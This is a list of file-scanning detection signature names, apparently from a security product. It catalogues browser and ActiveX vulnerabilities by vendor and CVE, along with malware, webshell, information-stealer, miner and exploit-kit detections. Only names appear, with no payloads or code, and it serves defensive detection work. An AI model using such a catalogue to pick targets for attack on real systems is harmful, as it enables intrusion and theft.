File-Text_Apache-Traffic-Server-Esi-Plugin-Cookie-Header-Information-Disclosure
File-Text_Apple-iPhoto-Xml-Title-Format-String-Vulnerability
File-Text_Apple-iTunes-Protocol-Handler-Stack-Buffer-Overflow
File-Text_Apple-QuickTime-ActiveX-Control-Clear-Method-Use-After-Free
File-Text_Apple-QuickTime-Player-Arbitrary-Code-Execution
File-Text_Apple-QuickTime-Plugin-Setlanguage-Buffer-Overflow
File-Text_Apple-QuickTime-Qtplugin-ActiveX-Control-Marshaled-Pointer
File-Text_Apple-QuickTime-QTPlugin.ocx-ActiveX-Vulnerable-Function-Call
File-Text_Apple-Safari-Arbitrary-Code-Execution
File-Text_Apple-Safari-CSS-Format-Argument-Handling-Memory-Corruption
File-Text_Apple-Safari-CSS-Style-Overflow-DOS
File-Text_Apple-Safari-Feed-URI-Denial-of-Service
File-Text_Apple-Safari-For-Windows-Protocol-Handler-Command-Injection
File-Text_Apple-Safari-For-Windows-URL-Spoofing
File-Text_Apple-Safari-HTML-Image-Element-Handling-Use-After-Free
File-Text_Apple-Safari-HTML-Image-Element-Handling-Use-After-Free-2
File-Text_Apple-Safari-HTML-Image-Element-Handling-Use-After-Free-3
File-Text_Apple-Safari-IDN-Punycode-Canadian-Syllabics-URL-Spoofing
File-Text_Apple-Safari-JS-Multibyte-Char-Escape
File-Text_Apple-Safari-KwqListIteratorImpl-DoS
File-Text_Apple-Safari-Null-Windows-File-Reference-DoS
File-Text_Apple-Safari-Objc-MsgSend-RTP-DoS
File-Text_Apple-Safari-Parent.close-Code-Execution
File-Text_Apple-Safari-Right-To-Left-Text-Rendering-Use-After-Free
File-Text_Apple-Safari-Url-Handling-Cross-Origin-Security-Bypass
File-Text_Apple-Safari-Webkit-Arbitrary-File-Creation
File-Text_Apple-Safari-Webkit-Attribute-Child-Removal-Code-Execution
File-Text_Apple-Safari-Webkit-Button-Column-Blocks-Memory-Corruption
File-Text_Apple-Safari-Webkit-Button-First-Letter-Style-Rendering-Code-Execution
File-Text_Apple-Safari-Webkit-CSS-Charset-Text-Transformation-Code-Execution
File-Text_Apple-Safari-Webkit-CSS-Title-Memory-Corruption
File-Text_Apple-Safari-Webkit-Floating-Point-Buffer-Overflow
File-Text_Apple-Safari-Webkit-Floating-Point-Data-Type-Code-Execution
File-Text_Apple-Safari-Webkit-Innerhtml-Double-Free-Memory-Corruption
File-Text_Apple-Safari-Webkit-Menu-Onchange-Memory-Corruption
File-Text_Apple-Safari-Webkit-Option-Element-Contenteditable-Code-Execution
File-Text_Apple-Safari-Webkit-Range-Object-Remote-Code-Execution
File-Text_Apple-Safari-Webkit-Rendering-Counter-Code-Execution
File-Text_Apple-Safari-Webkit-Selections-Use-After-Free
File-Text_Apple-Safari-Webkit-SVG-Memory-Corruption
File-Text_Apple-Safari-Webkit-Use-After-Free-Code-Execution
File-Text_Apple-Safari-Webkit-Webarchive-Injection
File-Text_Apple-Safari-Webkit-XSS-Vulnerability-CVE-2017-7089
File-Text_Apple-Safari-Windows-JavaScript-Infinite-Document-Write
File-Text_Apple-Webkit-Code-Execution-Vulnerability-CVE-2011-2813
File-Text_Apple-Webkit-Cross-Site-Scripting-CVE-2021-1879
File-Text_Apple-Webkit-Memory-Corruption-CVE-2016-4657
File-Text_Apple-Webkit-Rowspan-DoS
File-Text_Apple-Webkit-Ruby-Annotation-Memory-Corruption
File-Text_Apport-Remote-Code-Execution-Via-CrashDB-Field-CVE-2016-9949
File-Text_Arris-Motorola-Surfboard-SBG6580-Multiple-Vulnerabilites
File-Text_Artifex-Ghostscript-PostScript-Handling-S_xbcpe_process-Buffer-Overflow
File-Text_Artifex-Ghostscript-PostScript-Sandbox-Bypass-CVE-2018-17961
File-Text_Ask-Toolbar-ActiveX-Control-ShortFormat-Property-Buffer-Overflow
File-Text_Asp-Scripting-In-Server-Reply
File-Text_Astium-Remote-Code-Execution
File-Text_Asus-Net4Switch-Ipswcom.dll-ActiveX-Control-Stack-Buffer-Overflow
File-Text_AtHoc-IWSAlerts-ActiveX-Control-Buffer-Overflow
File-Text_Atlassian-Companion-Suspicious-Script
File-Text_Atlassian-JIRA-Email-Templates-Server-Side-Template-Injection
File-Text_Attachmate-Reflection-FTP-Client-ActiveX-Getglobalsettings-Memory-Corruption
File-Text_Aurigma-Image-Uploader-ActiveX-Control-Denial-Of-Service
File-Text_Aurigma-Image-Uploader-Buffer-Overflow
File-Text_Autodesk-IDrop-ActiveX-Control-Control-Buffer-Overflow
File-Text_Autodesk-Liveupdate-ActiveX-Control-Code-Execution
File-Text_Aviosys-IP-POWER-9258-W2-Information-Disclosure
File-Text_AwingSoft-Winds3D-Player-Command-Execution
File-Text_AwingSoft-Winds3D-Player-SceneURL-Buffer-Overflow
File-Text_Axis-Camera-Control-ActiveX-Control-SetBMP-Buffer-Overflow
File-Text_Axis-Communications-Camera-Control-ActiveX-Object
File-Text_Axis-Media-Control-Unsafe-ActiveX-Method
File-Text_Axis-Network-Camera-Remote-Code-Execution
File-Text_Backdoor-Script-Serv-U-FTP-User-CVE-2021-35211
File-Text_Baidu-Soba-Search-Bar-File-Download-And-Execute
File-Text_BaoFeng-Storm-ActiveX-Control-Multiple-Methods-Buffer-Overflow
File-Text_BaoFeng-Storm-ActiveX-Control-Multiple-Methods-Buffer-Overflow-2
File-Text_Base64-Encoded-HTML-Object
File-Text_Bennet-Tec-TList-ActiveX-SaveData-Arbitrary-File-Creation
File-Text_BentoML-RCE-CVE-2025-27520
File-Text_BentoML-Runner-Server-RCE-CVE-2025-32375
File-Text_BitDefender-Online-Scanner-ActiveX-Control-Buffer-Overflow
File-Text_Black-Ice-BIDIB.ocx-ActiveX-Arbitrary-File-Download
File-Text_BlazeVideo-BlazeDVD-Pro-PLF-File-Processing-Buffer-Overflow
File-Text_Broadwin-WebAccess-Client-Bwocxrun-ActiveX-Memory-Corruption
File-Text_Broadwin-WebAccess-Client-Bwocxrun-ActiveX-Ocxspool-Format-String
File-Text_CA-eTrust-Intrusion-Detection-CallCode-ActiveX-Control-Code-Execution
File-Text_CA-eTrust-PestPatrol-ActiveX-Control-Buffer-Overflow
File-Text_CA-Internet-Security-Suite-Xmlsecdb-ActiveX-Insecure-File-Creation
File-Text_CA-Multiple-Products-ActiveX-Control-ListCtrl-AddColumn-BOF
File-Text_CA-Multiple-Products-gui-cm-ctrls-ActiveX-Control-Memory-Corruption
File-Text_Cain-And-Abel-RDP-Buffer-Overflow
File-Text_CakePHP-PHP-Injection-Unserialize-Attack
File-Text_Camtron-CMNC-200-Buffer-Overflow-CVE-2010-4230
File-Text_CAPICOM-Utilities-ActiveX-Control-Vulnerable-Function-Call
File-Text_Centreon-Serverconnectionconfigurationservice.php-Command-Injection
File-Text_Chakra-Scripting-Engine-Memory-Corruption-CVE-2018-8556
File-Text_Chakra-Scripting-Engine-Memory-Corruption-CVE-2018-8557
File-Text_Chakra-Scripting-Engine-Memory-Corruption-Vulnerability-CVE-2018-8505
File-Text_Chrome-Safari-Floating-Styles-Use-After-Free-Code-Execution
File-Text_Chromium-and-Webkit-Iframe-Sandbox-Security-Bypass
File-Text_Chromium-Out-Of-Bounds-Write-V8-CVE-2021-30632
File-Text_Chromium-V8-Turbofan-Type-Confusion
File-Text_Cisco-AnyConnect-VPN-Client-ActiveX-Code-Execution
File-Text_Cisco-AnyConnect-VPN-Client-Software-Downgrade
File-Text_Cisco-ASA-Line-Dancer-Malware-Implant-Interaction
File-Text_Cisco-Data-Center-Network-Manager-Createlanfabric-Command-Injection
File-Text_Cisco-Data-Center-Network-Manager-Reporttemplateuploadpolicy-Directory-Traversal
File-Text_Cisco-IOS-XE-CVE-2023-20198-Implant-Detection
File-Text_Cisco-Linksys-PlayerPT-ActiveX-Control-Buffer-Overflow
File-Text_Cisco-Linksys-PlayerPT-Buffer-Overflow
File-Text_Cisco-Secure-Desktop-CSDwebinstaller-Code-Execution
File-Text_Cisco-Webex-Magic-Url-Remote-Command-Execution
File-Text_Cisco-Webex-Meeting-Manager-atucfobj-ActiveX-Control-BOF
File-Text_Cisco-Webex-Teams-URI-Handler-Remote-Code-Execution
File-Text_Citrix-Presentation-Server-Client-ActiveX-Control-Buffer-Overflow
File-Text_Classid-Obfuscated-Reference
File-Text_Clever-Internet-ActiveX-Suite-Arbitary-File-Overwrite
File-Text_Cobalt-Strike-Beacon-File
File-Text_Cobalt-Strike-Injector-File
File-Text_CocoaPods-Trunk-Server-Remote-Code-Execution-CVE-2024-38366
File-Text_Code-Protect-Obfuscated-JavaScript-Detected
File-Text_Coinhive-Miner
File-Text_Coinhive-Monero-JavaScript-Miner
File-Text_Coinminer-Trojan-Traffic
File-Text_Confluence-Improper-Authorization-CVE-2023-22518
File-Text_Connectwise-Screenconnect-Installextension-Directory-Traversal-CVE-2024-1708
File-Text_Contec-Conprosys-HMI-System-CVE-2023-28651-Stored-Cross-Site-Scripting
File-Text_Contec-Conprosys-HMI-System-CVE-2023-29154-SQL-Injection
File-Text_Core-Services-And-OLE-Automation-SubstringData-Memory-Corruption
File-Text_Corrupt-RTF-Header
File-Text_Creative-Software-AutoUpdate-Engine-ActiveX-Control-Buffer-Overflow
File-Text_CSU-Microsoft-Internet-Explorer-Uninitialized-Memory-CVE-2011-0036
File-Text_CYME-Multiple-Products-Chartfx-Remote-Code-Execution
File-Text_Danmec-Trojan-Download
File-Text_Darkness-Bot-Activity
File-Text_Darkshell-Botnet-Activity
File-Text_Data-Dynamics-ActiveBar-ActiveX-Control-actbar.ocx-Multiple-Insecure-Methods
File-Text_Decimal-Encoded-JavaScript
File-Text_Decimal-Encoded-JavaScript-2
File-Text_Delta-Industrial-Automation-Diaenergie-Handler_Cfg-Visual_Q_Add-SQL-Injection
File-Text_Delta-Industrial-Automation-Diaenergie-Postenergytype-Stored-Cross-Site-Scripting
File-Text_Delta-Industrial-Automation-Diaenergie-Setpf-Stored-Cross-Site-Scripting
File-Text_Destiny-Media-Player-Buffer-Overflow
File-Text_Directory-Traversal-To-Sensitive-Unix-File
File-Text_DivX-ActiveX-Browser-Plugin-Denial-of-Service
File-Text_DivX-Player-Subtitle-Parsing-Buffer-Overflow
File-Text_DjVu-ActiveX-Control-Buffer-Overflow
File-Text_DLL-Loading-Remote-Code-Execution-Vulnerability-CVE-2016-0041
File-Text_DNSChanger-Injected-Iframe
File-Text_Document-Template-Injection
File-Text_Double-Unescape-Evasion-Attempt-Detected
File-Text_Downloader-Malware
File-Text_Ebcrypt-ActiveX-Arbitrary-File-Overwrite
File-Text_eCentrex-VOIP-Client-Component-ActiveX-Control-Buffer-Overflow
File-Text_EDraw-Office-Viewer-ActiveX-Component-Unsafe-Method
File-Text_EDraw-Office-Viewer-ActiveX-Control-Vulnerable-OpenWebFile-Method-Call
File-Text_EDraw-PDF-Viewer-Insecure-ActiveX-Method-CVE-2009-2169
File-Text_EICAR-AntiVirus-Test-File
File-Text_EICAR-AntiVirus-Test2
File-Text_EK-Flash-Loader-Script
File-Text_Electron-Setasdefaultprotocolclient-Command-Injection
File-Text_Electronic-Arts-Origin-Client-URI-Handler-Remote-Code-Execution
File-Text_Electronic-Arts-SnoopyCtrl-ActiveX-Control-Control-Buffer-Overflow
File-Text_ElectronJS-Exodus-Wallet-Remote-Code-Execution
File-Text_Elipse-E3-ActiveReports-ActiveX-Vulnerability
File-Text_Embedded-ActiveX-Object-In-HTML
File-Text_Embedded-Assembly-Obvuscated-JavaScript
File-Text_Embedded-Java-Applet-In-HTML
File-Text_EMC-Captiva-PixTools-ActiveX-Control-File-Creation
File-Text_EMC-Captiva-QuickScan-Pro-Keyhelp-ActiveX-Control-Buffer-Overflow
File-Text_Emotet-Download-Page
File-Text_Encoded-Client-Side-Script
File-Text_Encoded-JavaScript-Detected
File-Text_Encoded-VBScript
File-Text_EnjoySAP-kwedit-ActiveX-Control-Buffer-Overflow
File-Text_EnjoySAP-rfcguisink-ActiveX-Control-Buffer-Overflow
File-Text_EQGRP-installdate.pl
File-Text_Esf-Pfsense-Status_RRD_Graph_img.php-Command-Injection
File-Text_Estsoft-Alzip-Mim-File-Processing-Buffer-Overflow
File-Text_Eudora-Url-Handling-Buffer-Overflow
File-Text_Excessively-Long-Asp-Include-File-Argument
File-Text_Exiftool-DjVu-Remote-Code-Execution
File-Text_Extremely-Obfuscated-Script-File
File-Text_F5-Big-IP-iControl-CSRF-File-Write-Soap-API
File-Text_F5-Big-IP-Next-Central-Manager-Login-SQL-Injection-CVE-2024-26026
File-Text_Facebook-Photo-Uploader-ActiveX-Control-FileMask-Method-BOF
File-Text_Fallout-Exploit-Kit-Landing-Page
File-Text_Filtering-Detection-Limit
File-Text_Firefox-Cookie-Site-Bondary-Bypass
File-Text_Firefox-Executable-Image-Dragging-Vulnerability
File-Text_Firefox-JavaScript-Engine-Memory-Corruption
File-Text_Firefox-MCallGetProperty-Write-Side-Effects-Use-After-Free-Exploit
File-Text_Firefox-Plugin-Finder-JavaScript-Injection
File-Text_Firefox-SVG-JavaScript-Zoom-Memory-Corruption
File-Text_Firefox-WYCIWYG-Cache-Manipulation
File-Text_Flarum-Core-Cross-Site-Scripting
File-Text_Flexera-InstallShield-ISGrid2.dll-Heap-Buffer-Overflow
File-Text_Flexera-Multiple-Products-Isgrid.dll-ActiveX-Control-Code-Execution
File-Text_Fluentd-Oj-Parser-Insecure-Deserialization-CVE-2022-39379
File-Text_Fortinet-FortiOS-Heap-Buffer-Overflow-CVE-2018-13383
File-Text_Free-Online-PHP-Obfuscator-Code
File-Text_Freetype-Heap-Buffer-Overflow-CVE-2020-15999
File-Text_Froxlor-Simexporter.php-Import-Unrestricted-File-Upload
File-Text_Galaxy-Store-Webview-Filter-Bypass-CVE-2023-21434
File-Text_GE-Proficy-Historian-Keyhelp-ActiveX-Remote-Code-Execution
File-Text_General-Server-Status-Stream
File-Text_Generic-Cmd-Encoder
File-Text_Generic-JavaScript-Obfuscator
File-Text_Generic-Shellcode-3
File-Text_Generic-Shellcode-Base64-Kernel32
File-Text_Generic-Shellcode-Hex-Encoded-Kernel32
File-Text_Geovision-Livex-Directory-Traversal-Vulnerability
File-Text_Ghostscript-File-Command-Execution
File-Text_Ghostscript-Format-String-Exploitation-CVE-2024-29510
File-Text_Git-Source-Code-Management-Apply-Reject-Arbitrary-File-Write
File-Text_Gitlab-Community-And-Enterprise-Edition-Autolinkfilter-Regex-Denial-Of-Service
File-Text_Gitlab-Community-And-Enterprise-Edition-GitHub-Import-Remote-Code-Execution
File-Text_Gitlab-Community-And-Enterprise-Edition-Label-Color-Stored-Cross-Site-Scripting
File-Text_Gitlab-Community-And-Enterprise-Edition-Pin-Menu-Denial-Of-Service
File-Text_Gitlab-Community-And-Enterprise-Edition-Runner-Description-Denial-Of-Service
File-Text_Gitlab-Project-Import-Command-Injection
File-Text_GL.iNet-Unauthenticated-Remote-Command-Execution-Via-The-Logread-Module
File-Text_Glasstoken-WebShell
File-Text_Globals-PHP-Obfuscator-Code
File-Text_GLPI-Computervirtualmachine-SQL-Injection
File-Text_GLPI-Inventory-Agent-SQL-Injection
File-Text_GLPI-Inventory-Agent-SQL-Injection-CVE-2023-46727
File-Text_Gnome-Project-Libxslt-Library-Rc4-Key-String-Buffer-Overflow
File-Text_GOM-Player-ActiveX-Control-OpenURL-Method-Buffer-Overflow
File-Text_Google-Android-Browser-Same-Origin-Policy-Bypass
File-Text_Google-Apps-Mailto-URI
File-Text_Google-Chrome-And-Apple-Safari-Runin-Handling-Use-After-Free
File-Text_Google-Chrome-Blink-Imagebitmap-Integer-Overflow
File-Text_Google-Chrome-FileReader-Use-After-Free-CVE-2019-5786
File-Text_Google-Chrome-GURL-Cross-Origin-Bypass
File-Text_Google-Chrome-Insufficient-Validation-CVE-2021-21220
File-Text_Google-Chrome-Locationattributesetter-Use-After-Free
File-Text_Google-Chrome-Multiple-File-Type-Security-Bypass
File-Text_Google-Chrome-Notifyinstancewasdeleted-Use-After-Free
File-Text_Google-Chrome-Object-Lifecycle-Issue
File-Text_Google-Chrome-Stale-Pointer-In-Floats-Rendering-Memory-Corruption
File-Text_Google-Chrome-Type-Confusion-CVE-2020-6418
File-Text_Google-Chrome-Type-Confusion-CVE-2021-21224
File-Text_Google-Chrome-Type-Confusion-CVE-2021-30563
File-Text_Google-Chrome-Type-Confusion-CVE-2022-1096
File-Text_Google-Chrome-Type-Confusion-CVE-2022-4262
File-Text_Google-Chrome-Type-Confusion-CVE-2023-2033
File-Text_Google-Chrome-Use-After-Free-CVE-2019-13720
File-Text_Google-Chrome-Use-After-Free-CVE-2019-5869
File-Text_Google-Chrome-Use-After-Free-CVE-2020-6378
File-Text_Google-Chrome-Use-After-Free-CVE-2021-37975
File-Text_Google-Chrome-Use-After-Free-CVE-2022-3038
File-Text_Google-Chrome-Use-After-Free-CVE-2023-6112
File-Text_Google-Chrome-V8-Crankshaft-Type-Confusion
File-Text_Google-Chrome-V8-Engine-Jsstackcheck-Type-Confusion
File-Text_Google-Chrome-V8-Remote-Code-Execution-CVE-2020-16040
File-Text_Google-Chrome-V8-Type-Confusion-CVE-2021-30551
File-Text_Google-Chrome-WebGL-2-Readpixels-Heap-Buffer-Overflow
File-Text_Google-Chrome-Xssauditor-Filter-Security-Policy-Bypass
File-Text_Google-Golang-Get-Command-Injection
File-Text_Google-Golang-Get-Remote-Command-Execution
File-Text_Google-Search-Appliance-Command-Execution
File-Text_Grafana-Labs-Grafana-Geomap-Attribution-Stored-Cross-Site-Scripting
File-Text_GrandSoft-EK-Exploit-Redirect-Page
File-Text_Green-Dam-Youth-Escort-Long-URI-Handling-Buffer-Overflow
File-Text_GrimResource-Remote-Code-Execution-Via-Windows-MSC-Files-CVE-2024-43572
File-Text_Gumblar-Bot-Traffic
File-Text_Haihaisoft-Universal-Player-Stack-Based-Buffer-Overflow
File-Text_Harbor-Project-Harbor-User-API-Privilege-Escalation
File-Text_Hex-Encoded-Script-Data-Content
File-Text_Hex-Encoded-String-In-Script-File
File-Text_Hexojs-Hexo-Includecodetag-Path-Traversal
File-Text_Hex_Encoded_Url_Detected
File-Text_Hikvision-Command-Injection-CVE-2021-36260
File-Text_Honeywell-ActiveX-Control-Code-Execution
File-Text_Honeywell-Multiple-Products-Hscremotedeploy.dll-ActiveX-Control-Code-Execution
File-Text_Honeywell-Opos-Suite-Hwoposscale.ocx-Open-Method-Stack-Buffer-Overflow
File-Text_Honeywell-Opos-Suite-Hwoposscanner.ocx-Open-Method-Stack-Buffer-Overflow
File-Text_HP-App-Lifecycle-Management-ActiveX-Control-Arbitrary-File-Overwrite
File-Text_HP-Application-Lifecycle-Management-ActiveX-Insecure-Method-Exposure
File-Text_HP-Easy-Printer-Care-ActiveX-Control-Directory-Traversal
File-Text_HP-Easy-Printer-Care-Software-ActiveX-Control-Directory-Traversal
File-Text_HP-HpqUtil-ActiveX-Component-ListFiles-Method-Buffer-Overflow
File-Text_HP-Info-Center-ActiveX-Control-Absolute-Path-Traversal
File-Text_HP-Info-Center-ActiveX-Control-Registry-Access
File-Text_HP-Info-Center-HPInfo-Class-ActiveX-Control-Insecure-Methods
File-Text_HP-Load-Runner-Directory-Traversal
File-Text_HP-LoadRunner-Controller-Scenario-File-Stack-Buffer-Overflow
File-Text_HP-LoadRunner-Lrfileioservice-ActiveX-Input-Validation-Error
File-Text_HP-LoadRunner-Micwebajax-ActiveX-Control-Stack-Buffer-Overflow
File-Text_HP-LoadRunner-Writefilestring-Directory-Traversal
File-Text_HP-LoadRunner-Xupload-ActiveX-Control-Arbitrary-File-Download
File-Text_HP-LoadRunner-Xupload-ActiveX-Control-Buffer-Overflow
File-Text_HP-Mercury-TestDirector-ActiveX-Control-Buffer-Overflow
File-Text_HP-Photo-Creative-Audio-ActiveX-BOF
File-Text_HP-Point-Of-Sale-Opos-Driver-Oposposkeyboard.ocx-Buffer-Overflow2
File-Text_HP-Point-Of-Sale-Opos-Driver-Opostoneindicator.ocx-Stack-Buffer-Overflow
File-Text_HP-Software-Update-HPeDiag-ActiveX-Control-Buffer-Overflow
File-Text_HP-Software-Update-Tool-ActiveX-Control-File-Overwrite
File-Text_HP-Sprinter-Tidestone-Formula-One-ActiveX-Multiple-Memory-Corruption
File-Text_HP-VAN-SDN-Controller-Command-Injection
File-Text_HP-Virtual-Rooms-Install-Multiple-Remote-Buffer-Overflow-Vulnerabilities
File-Text_HPE-Insight-Remote-Support-SetInputStream-XML-External-Entity-Injection-CVE-2024-11622
File-Text_HPE-Intelligent-Management-Center-Saveselecteddevices-Expression-Language-Injection
File-Text_HTML-Body-OffsetTop
File-Text_HTML-Body-Onload-runTest
File-Text_HTML-Empty-Input-Tag
File-Text_HTML-Form-Pointed-To-Localhost
File-Text_HTML-Malicious-Looking-Scripts-Within-Web-Page
File-Text_HTML-Malicious-Looking-Web-Page
File-Text_HTML-Null-Character-Evasion-Method
File-Text_HTML-Possible-Mahdi-Traffic
File-Text_HTML-Suspicious-Content
File-Text_HTML-Suspicious-Function-Name
File-Text_HTML-Suspicious-Function-Name-2
File-Text_HTML-Suspicious-Function-Name-3
File-Text_HTML-Suspicious-Length-In-Script
File-Text_HTML-Suspicious-Onload
File-Text_HTML-Suspicious-Webkit
File-Text_HTML-Tag-Detector
File-Text_HTTP-Equiv-Etag-Parameter
File-Text_HTTP-Headers-Continued-After-White-Spaces
File-Text_HTTP-Headers-In-Payload
File-Text_HTTP-Request-To-0.0.0.0-In-Script
File-Text_Hyleos-ChemView-Buffer-Overflow
File-Text_IBiz-EBanking-Integrator-ActiveX-WriteOFXDataFile-Method-Arbitrary-File-Write
File-Text_IBM-Access-Support-ActiveX-Getxmlvalue-Method-Buffer-Overflow
File-Text_IBM-Aspera-Faspex-Remote-Code-Execution-CVE-2022-47986
File-Text_IBM-iNotes-ActiveX-Control-Integer-Overflow
File-Text_IBM-Installation-Manager-IIM-URI-Handling-Code-Execution
File-Text_IBM-Lotus-Domino-Web-Access-ActiveX-Control-Buffer-Overflow
File-Text_IBM-Lotus-Expeditor-cai-URI-Handler-Command-Execution
File-Text_IBM-Lotus-iNotes-Dwa85w.dll-ActiveX-Control-Buffer-Overflow
File-Text_IBM-Lotus-Notes-Cross-Site-Scripting
File-Text_IBM-Lotus-Notes-HTML-Message-Handling-Buffer-Overflow
File-Text_IBM-Lotus-Notes-HTML-Speed-Reader-Long-Url-Buffer-Overflow
File-Text_IBM-Lotus-Notes-Url-Handler-Command-Execution
File-Text_IBM-Lotus-Quickr-Qp2.cab-ActiveX-Control-Stack-Buffer-Overflow
File-Text_IBM-Rational-Clearquest-Cqole-ActiveX-Code-Execution
File-Text_IBM-Rational-Rhapsody-Bb-Flashback-Fbrecorder-Multiple-Vulnerabilities
File-Text_IBM-SPSS-Samplepower-C1sizer-ActiveX-Control-Buffer-Overflow
File-Text_IBM-SPSS-Samplepower-Vsflex7l-ActiveX-Control-Buffer-Overflow
File-Text_IBM-SPSS-Samplepower-Vsflex8l-ActiveX-Control-Buffer-Overflow
File-Text_IBM-SPSS-Samplepower-Vsflex8l.ocx-Combolist-And-Colcombolist-Buffer-Overflow
File-Text_IBM-SPSS-Vsview6.ocx-ActiveX-Control-Code-Execution
File-Text_IBM-Tivoli-Provisioning-Manager-Express-Isig.isigctl.1-ActiveX-BOF
File-Text_ICONICS-Dialog-Wrapper-Module-ActiveX-Control--Overflow
File-Text_ICONICS-WebHMI-ActiveX-Control-Stack-Buffer-Overflow-Vulnerability
File-Text_ICONICS-WebHMI-ActiveX-Control-Stack-Buffer-Overflow-Vulnerability-2
File-Text_IDAutomation-Barcode-ActiveX-Components-File-Write
File-Text_Ie-Anchorclick-Style-File-Import
File-Text_Iframe-Src-From-IP-Address
File-Text_Imagemagick-Ephemeral-Protocol-Arbitrary-File-Deletion
File-Text_Imagemagick-File-Moving-Vulnerability
File-Text_Imagemagick-HTTP-Request-Vulnerability
File-Text_Imagemagick-Local-File-Read-Vulnerability
File-Text_Imagemagick-Shell-Character-Filtering-Code-Execution
File-Text_Indexing-Service-Memory-Corruption-CVE-2009-2507
File-Text_Indusoft-Thin-Client-ActiveX-Heap-Buffer-Overflow
File-Text_Indusoft-Thin-Client-ISSymbol-ActiveX-InternationalOrder-Heap-BOF
File-Text_Information-Stealer-Using-Fake-Browser-Dialogs
File-Text_Ingress-Nginx-Controller-Kubernetes-Annotation-Injection
File-Text_Injected-Wordpress-JavaScript
File-Text_Intellian-Aptus-Web-OS-Command-Injection
File-Text_Internet Explorer-BGSOUND-Denial-Of-Service-CVE-2006-0544
File-Text_Internet-Explorer-11-Information-Disclosure-Vulnerability-CVE-2019-0676
File-Text_Internet-Explorer-7-Navigation-Canceled-Page-Cross-Site-Scripting
File-Text_Internet-Explorer-ADODB-Recordset-Filter-ActiveX-Vulnerability-CVE-2006-3354
File-Text_Internet-Explorer-Applet-File-Path-Denial-Of-Service
File-Text_Internet-Explorer-ASLR-Bypass-CVE-2015-0069
File-Text_Internet-Explorer-AxDebugger-Document-ActiveX-Vulnerability
File-Text_Internet-Explorer-Cached-Objects-Zone-Bypass
File-Text_Internet-Explorer-CDocument-Object-Use-After-Free
File-Text_Internet-Explorer-Com-Object-Instantiation-Memory-Corruption
File-Text_Internet-Explorer-Com-Object-System-Compromise
File-Text_Internet-Explorer-CreateTextRange-Vulnerability
File-Text_Internet-Explorer-CreateTextRange-Vulnerability-2
File-Text_Internet-Explorer-CreateTextRange-Vulnerability-3
File-Text_Internet-Explorer-CVE-2014-2795
File-Text_Internet-Explorer-CVE-2014-2801
File-Text_Internet-Explorer-CVE-2015-6065
File-Text_Internet-Explorer-CVE-2015-6066
File-Text_Internet-Explorer-CVE-2015-6068
File-Text_Internet-Explorer-CVE-2015-6070
File-Text_Internet-Explorer-CVE-2015-6076
File-Text_Internet-Explorer-CVE-2017-0018
File-Text_Internet-Explorer-CVE-2017-0037
File-Text_Internet-Explorer-CVE-2017-0154
File-Text_Internet-Explorer-Daxctle.ocx-KeyFrame-Method-Memory-Corruption
File-Text_Internet-Explorer-Deleted-Data-Source-Object-Memory-Corruption
File-Text_Internet-Explorer-DirectAnimation.DATuple-Com-Object-Memory-Corruption
File-Text_Internet-Explorer-DirectAnimation.DAUserData.Data-DoS
File-Text_Internet-Explorer-DirectAnimation.StructuredGraphicsControl.SourceURL-DoS
File-Text_Internet-Explorer-Directory-Traversal-Privilege-Escalation-CVE-2015-0016
File-Text_Internet-Explorer-DOM-Object-Cache-Management-Memory-Corruption
File-Text_Internet-Explorer-EUC-JP-Character-Encoding-Universal-XSS
File-Text_Internet-Explorer-getElementById-JavaScript-For-Loop-DoS
File-Text_Internet-Explorer-HTML-Elements-Buffer-Overflow
File-Text_Internet-Explorer-HtmlDlgSafeHelper-Fonts-DoS
File-Text_Internet-Explorer-Image-Processing-Argument-Handling-Memory-Corruption
File-Text_Internet-Explorer-Imjpcksid.dll-Com-Object-Memory-Corruption
File-Text_Internet-Explorer-Information-Disclosure-Vulnerability-CVE-2016-3261
File-Text_Internet-Explorer-Long-Hostname-Memory-Corruption-Buffer-Overflow
File-Text_Internet-Explorer-Memory-Corruption-CVE-2013-3115
File-Text_Internet-Explorer-Memory-Corruption-CVE-2013-3143
File-Text_Internet-Explorer-Memory-Corruption-CVE-2013-3144
File-Text_Internet-Explorer-Memory-Corruption-CVE-2013-3145
File-Text_Internet-Explorer-Memory-Corruption-CVE-2013-3146
File-Text_Internet-Explorer-Memory-Corruption-CVE-2013-3147
File-Text_Internet-Explorer-Memory-Corruption-CVE-2013-3148
File-Text_Internet-Explorer-Memory-Corruption-CVE-2018-0988
File-Text_Internet-Explorer-Memory-Corruption-CVE-2018-8267
File-Text_Internet-Explorer-Memory-Corruption-CVE-2018-8447
File-Text_Internet-Explorer-Memory-Corruption-CVE-2018-8456
File-Text_Internet-Explorer-Memory-Corruption-CVE-2018-8461
File-Text_Internet-Explorer-Memory-Corruption-Vulnerability-CVE-2015-0099
File-Text_Internet-Explorer-Memory-Corruption-Vulnerability-CVE-2016-0063
File-Text_Internet-Explorer-Memory-Corruption-Vulnerability-CVE-2016-0113
File-Text_Internet-Explorer-Memory-Corruption-Vulnerability-CVE-2016-0164
File-Text_Internet-Explorer-Memory-Corruption-Vulnerability-CVE-2016-0200
File-Text_Internet-Explorer-Memory-Corruption-Vulnerability-CVE-2016-3240
File-Text_Internet-Explorer-Memory-Corruption-Vulnerability-CVE-2016-3241
File-Text_Internet-Explorer-Memory-Corruption-Vulnerability-CVE-2016-3242
File-Text_Internet-Explorer-Memory-Corruption-Vulnerability-CVE-2016-3259
File-Text_Internet-Explorer-Memory-Corruption-Vulnerability-CVE-2018-8460
File-Text_Internet-Explorer-Memory-Corruption-Vulnerability-CVE-2018-8491
File-Text_Internet-Explorer-MSHTML-CSS-Buffer-Overflow
File-Text_Internet-Explorer-MSHTML.DLL-Parsing-DoS
File-Text_Internet-Explorer-MSOE-CHTSKDIC-And-IMSKDIC-Com-Object-Vulnerability
File-Text_Internet-Explorer-Multiple-Com-Objects-Instantiation-Memory-Corruption
File-Text_Internet-Explorer-Multiple-Com-Objects-System-Compromise
File-Text_Internet-Explorer-Nested-Object-Tag-Memory-Corruption
File-Text_Internet-Explorer-NMSA-ASFSourceMediaDescription-CVE-2006-3897
File-Text_Internet-Explorer-Object-Tag-Popup
File-Text_Internet-Explorer-Object-Type-Open-Window
File-Text_Internet-Explorer-Object.Microsoft.DXTFilter.Enabled-DoS
File-Text_Internet-Explorer-OutlookExpress.AddressBook-DoS
File-Text_Internet-Explorer-Remote-Code-Execution-Vulnerability-CVE-2017-8594
File-Text_Internet-Explorer-Remote-Code-Execution-Vulnerability-CVE-2017-8618
File-Text_Internet-Explorer-Remote-Code-Execution-Vulnerability-CVE-2018-8653
